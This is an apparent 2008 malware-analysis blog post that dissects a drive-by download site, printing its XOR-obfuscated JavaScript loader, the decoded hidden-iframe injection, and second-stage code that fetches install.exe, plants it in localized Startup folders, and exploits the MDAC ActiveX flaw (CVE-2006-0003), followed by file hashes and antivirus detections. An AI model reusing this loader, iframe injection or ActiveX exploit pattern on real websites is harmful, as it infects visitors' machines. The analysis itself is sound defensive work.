DNAScan Malicious Network Activity Reverse Engineering

November 28, 2009

http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html


Best_Pool Exploit and Malware WebSite

April 12, 2008

Hi,

Yesterday by searching between the most strange WebSites, signaled in a forum, I’ve discovered that one of them contains an Exploit + Malware..

The Website is Best_Pool.

Suddenly I’ve inspected it with Malzilla, and an eloquent JS was loaded:

<script>
var data=unescape(“%7B%14%04%15%0E%17%13g%2B%26%29%202%26%20%22ze%0D%261%26%14%245.73eyg%23
%28%242%2A%22%293i05.3%22o%60%7B.%215%26%2A%22g45%24ze%2F337%7Dhh1.7%264%283%2C%26i%24%28%2
Ah.%29i7%2F7x%26%231zrwsva1%26%2Bzspq%25s%24%7F%26eg43%3E%2B%22ze%23.47%2B%26%3E%7D%29%28%2
9%22ey%7Bh.%215%26%2A%22y%60n%7Cg%7Bh%14%04%15%0E%17%13y”);var dec=””;
for(idx=0;idx<data.length;idx++){dec+=String.fromCharCode(data.charCodeAt(idx)^71);
}document.write(unescape(dec));
</script>

Clearly obfuscated, but in two easy steps I decoded it:

<SCRIPT language=”JavaScript”>
document.write(‘<iframe src=”http://{CENSORED}c8a”
style=”display:none”></iframe>’);
</SCRIPT>

A classical Iframe infection, so let’s check what happens into http://{CENSORED}c8a..
Malzilla detects a redirection to: http://{CENSORED}/in.php?adv=5041&val=476b4c8a a page
that contains a big Javascript obfuscated.

This JS contains three functions:

zhhrgjuf(n)
oafvme(a)
rkgganati(str)

and a big piece of encoded stuff, also this can be decoded easly, and what appears is an
HTML page that contains another JS.

Let’s analyse that JS:

It implements a function lsrn(lev3par1), inside this we notice suddenly a link to an
executable: http://{CENSORED{/adw_files/5041/175c7663/install.exe?id=1
another Variable contains:

var obj_WScript=objmker(lev3par1,”WScript.Shell”)
var obj_WScript=objmker(lev3par1,”WScript.Shell”)

hdrive+”\\Documents and Settings\\All Users\\Menu Inicio\\Programas\\Inicio”+exes
hdrive+”\\Documents and Settings\\All Users\\Menuen Start\\Programmer\\Start”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programma\\’s\\Opstarten+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Avvio\\Programmi\\Esecuzione automatica”+exes
hdrive+”\\Documents and Settings\\All Users\\Kaynnista-valikko\\Ohjelmat\\Kaynnistys”+exes
hdrive+”\\Documents and Settings\\All Users\\Start Menu\\Programlar\\BASLANGIC”
hdrive+”\\Documents and Settings\\All Users\\Start-meny\\Programmer\\Oppstart”+exes
hdrive+”\\Documents and Settings\\All Users\\Start-menyn\\Program\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Iniciar”+exes
hdrive+”\\Dokumente und Einstellungen\\All Users\\Startmenu\\Programme\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup”+exes

To cover the major part of users, JS builds these paths relative to various languages.
Now we can see an intersing piece of code, with a CLSID:

var obj2mk=”testobj”+”.innerHTML”+”=testobj”+
“.innerHTML”+”+\”<object”+” classid”+”=’clsid:”
+”527196a4-b1a3-4647-931d-37ba5af23037″+”‘ codebase=”+”‘\”+fnex+\”‘></”+”object>\”;”;

first of all let’s search this CLSID, we discover that is referred to MDAC ActiveX
code execution (CVE-2006-0003)

An attacker who successfully exploited this vulnerability could gain the same user rights
as the local user. Users whose accounts are configured to have fewer user rights on the
system could be less impacted than users who operate with administrative user rights.

It’s clear now!
the malicious executable install.exe is downloaded, and inserted into Autostart.

Next step is to download and study this exexutable, here some characteristics of this malware:

——–
File size: 67584 bytes
MD5: 1a7baafd0d2c53c1e711a940fe6fdbeb
SHA1: a3426c0322ca1de1b83d0f5d6d1ce7366ce30f39
SHA256: e44f9e28c6810a48ca5e3b13f1585e82d37f21eed5fe88ac688f915a863d82f1
SHA512: 36f48a1a71e624dc4219a857df7ea41c7b9dd4180a78870ff6f7a78c9d2c8231
5f25cbd34db102c630b973363e211a6c0b5ac223baa2fb0fe36c3060fddd7416
——–

AntiVir                 2008.04.11     HEUR/Crypted
CAT-QuickHeal   2008.04.10     (Suspicious) – DNAScan
F-Secure              2008.04.11     Suspicious:W32/Malware!Gemini
eSafe                    2008.04.09     Suspicious File
Microsoft             2008.04.11     Trojan:Win32/Tibs.gen!H
Sophos                2008.04.11     Troj/Dorf-BB

Other Antivirus does not detect it!

See you to the next post.. :)


Follow

Get every new post delivered to your Inbox.